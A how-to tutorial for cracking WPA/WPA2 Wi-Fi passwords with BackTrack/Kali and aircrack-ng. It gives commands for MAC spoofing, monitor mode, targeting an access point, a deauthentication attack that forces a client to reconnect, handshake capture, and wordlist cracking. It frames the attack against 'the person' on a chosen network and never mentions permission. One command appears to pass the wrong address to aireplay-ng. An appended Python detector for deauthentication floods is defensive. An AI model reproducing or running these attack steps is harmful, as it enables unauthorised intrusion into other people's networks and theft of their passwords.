Some requirements
1. We need to boot or install Kali Linux or BackTrack.
2. A wireless network card that supports packet injection.
Some important terms
1. MAC Address (Media Access Control Address).
2. WAP (Wireless Access Point).
3. PSK (Pre-Shared Key).
4. WPA/WPA2 (Wi-Fi Protected Access / Wi-Fi Protected Access 2).
5. BSSID (Basic Service Set Identifier).
There are a few steps to be followed:
First step (1):
- In BackTrack open the terminal and give the command 'ifconfig'.
- You will see a list of all the network adapters in your system, like wlan0, wlan1, etc.
- Turn off your network card using the command: ifconfig wlan0 down (change wlan0 to whatever name the previous command showed).
- Give the command: macchanger -m 00:11:22:33:44:55 wlan0
- Turn the device back on by giving the command: ifconfig wlan0 up
Second step (2):
Second step is all about creating a virtual monitor interface.
- Give the command: airmon-ng start wlan0
- It creates a new monitor interface known as mon0.
Third step (3):
Start the attack by monitoring the wireless traffic.
- Give the command: airodump-ng mon0. It will list all active APs with their BSSID and other details. Below that list you will also see the stations (client computers) connected to each AP.
- Note down the BSSID and the channel (the CH column in the output) of the AP you want to target.
- Hit Ctrl+C to end the monitoring.
Fourth step (4):
Lock onto the needed AP.
This targets the traffic from just the access point you want and writes the collected information to a file.
What we are hoping to capture is the 4-way handshake data that the systems use to authenticate; this data can then be used to crack the password.
- Give the command: airodump-ng --bssid <BSSID of AP> -c 4 -w dumpfilename mon0 (replace 4 with the channel you noted earlier).
- This will start monitoring the access point and also show you the stations connected to it. Write down the BSSID of any one of the stations so that you can trick it into disconnecting and reconnecting.
Capturing authentication packets: this will only work if your network card supports packet injection; otherwise you will have to wait until the person disconnects and reconnects by themselves.
- Open a new terminal and give the command:
aireplay-ng -0 30 -a <BSSID of Station Connected> mon0
- This will send 30 disconnect requests to the computer, causing it to try to reconnect to the access point.
- If it shows an error or does not seem to work, it is probably an issue with the network card and you will need to wait until the user reconnects by themselves.
- Once the reconnection happens you can see it in the airodump-ng terminal, which is monitoring the packets. An alert should be shown in the top right corner.
Hit Ctrl+C and exit it. Time to crack the password.
- You need a password list (wordlist) file, which can be downloaded from the internet. Just search for "wordlist" or "password list"; you can get files with millions of words, some as big as 1 GB to 10 GB. The more words it has, the better.
- Get and extract the wordlist file to your home folder.
- Run the command:
aircrack-ng -w wordlist.lst -b <AP BSSID> dumpfilename*.cap
- Replace the placeholders in angle brackets with the right details.
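The burst of disconnect frames sent in the aireplay-ng step above is exactly what a wireless IDS keys on, which is the defender's side of this procedure. The following Python detector is an added example, not part of this tutorial; the frame records, addresses, threshold and window are constructed for illustration:

```python
"""Added example (not from the tutorial): flag a deauthentication flood in a
stream of 802.11 management-frame records, the noisy part of the capture step."""
from collections import defaultdict, deque

# 802.11 management frame subtypes (frame control field of the MAC header)
DISASSOC = 10
DEAUTH = 12

def detect_deauth_flood(frames, threshold=10, window=5.0):
    """frames: iterable of (timestamp_s, subtype, bssid, src_addr, dst_addr),
    in time order.  Returns [(bssid, src_addr), ...] for every sender that
    emitted >= threshold deauth/disassoc frames within any window-second span.
    One deauth is normal (a client leaving); dozens in seconds from one sender
    is a forced-reconnect pattern worth alerting on."""
    recent = defaultdict(deque)   # (bssid, src) -> timestamps inside the window
    flagged = []
    for ts, subtype, bssid, src, _dst in frames:
        if subtype not in (DEAUTH, DISASSOC):
            continue
        q = recent[(bssid, src)]
        q.append(ts)
        while ts - q[0] > window:  # slide the window forward (q is never empty here)
            q.popleft()
        if len(q) >= threshold and (bssid, src) not in flagged:
            flagged.append((bssid, src))
    return flagged

# Constructed sample: the AP BSSID and the client addresses are made up.
AP = "AA:BB:CC:DD:EE:01"
CLIENT = "AA:BB:CC:DD:EE:42"
OTHER = "AA:BB:CC:DD:EE:43"

def sample_frames():
    frames = [(0.0, DEAUTH, AP, OTHER, AP)]  # one client leaving normally
    # 30 deauth frames 0.1 s apart, carrying the AP's own address as source:
    # the shape of a forced disconnect aimed at a single client.
    frames += [(10.0 + i * 0.1, DEAUTH, AP, AP, CLIENT) for i in range(30)]
    frames += [(20.0, 8, AP, AP, "FF:FF:FF:FF:FF:FF")]  # a beacon, ignored
    return frames

if __name__ == "__main__":
    for bssid, src in detect_deauth_flood(sample_frames()):
        print(f"deauth flood on {bssid} from {src}: consider enabling 802.11w (PMF)")
```

Protected Management Frames (802.11w) make such spoofed deauthentication frames unverifiable to the client, so the detector is most useful on networks that cannot yet enable it.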